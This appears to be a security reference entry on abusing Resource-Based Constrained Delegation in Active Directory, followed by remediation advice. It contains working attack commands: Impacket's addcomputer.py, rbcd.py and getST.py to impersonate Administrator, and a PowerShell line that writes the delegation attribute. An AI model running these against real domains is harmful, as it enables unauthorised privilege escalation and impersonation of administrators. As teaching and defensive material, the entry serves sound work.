Resource-Based Constrained Delegation (RBCD)
Description
RBCD lets the target resource specify who can delegate to it by controlling the msDS-AllowedToActOnBehalfOfOtherIdentity attribute. If attackers gain write access to this attribute on a server/computer object (via GenericWrite, WriteDACL, or mis-scoped groups), they can grant a machine they control the right to impersonate any user (including domain admins) to that resource. This is commonly abused in combination with LDAP write primitives (e.g., relayed connections) to persist access.
Examples
Granting RBCD via Write Access
Create or use a controlled computer account and grant it RBCD on a target server:
# Create a machine account the attacker controls
addcomputer.py -dc-ip 10.0.0.10 corp.local/attacker:'Passw0rd!' -computer-name 'WS01$' -computer-pass 'P@ssw0rd123!'
# Grant RBCD (delegate-from WS01 to target SERVER01)
rbcd.py -dc-ip 10.0.0.10 -t SERVER01$ -f WS01$ corp.local/attacker:'Passw0rd!'
Impersonate a Privileged User to the Target Service
Request a service ticket as Administrator to an SPN on the target:
getST.py -dc-ip 10.0.0.10 -spn cifs/SERVER01.corp.local -impersonate Administrator corp.local/WS01$:'P@ssw0rd123!'
export KRB5CCNAME=Administrator.ccache
Use the ticket to access the service (e.g., SMB on SERVER01).
Set RBCD with PowerShell (ACL write)
If you have rights to modify the target computer object ACL, you can set the RBCD SDDL directly:
$Sid=(Get-ADComputer WS01 -Properties sid).Sid
Set-ADComputer SERVER01 -Add @{'msDS-AllowedToActOnBehalfOfOtherIdentity'=(New-Object System.Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;FA;;;$Sid)").GetBinaryForm([byte[]]::new(1000),[ref]0)}
Remediation
- Lock down delegation attributes
- Only the computer account itself and Tier‑0 admins should write
msDS-AllowedToActOnBehalfOfOtherIdentity. - Remove orphaned ACEs left by decommissioned tooling.
- Only the computer account itself and Tier‑0 admins should write
- Prefer ephemeral access over persistent delegation
- Replace broad write permissions with JEA/JIT models and Privileged Access Workstations.
- Monitor and respond
- Alert on modifications to the RBCD attribute and on sudden ability of new principals to delegate to a resource.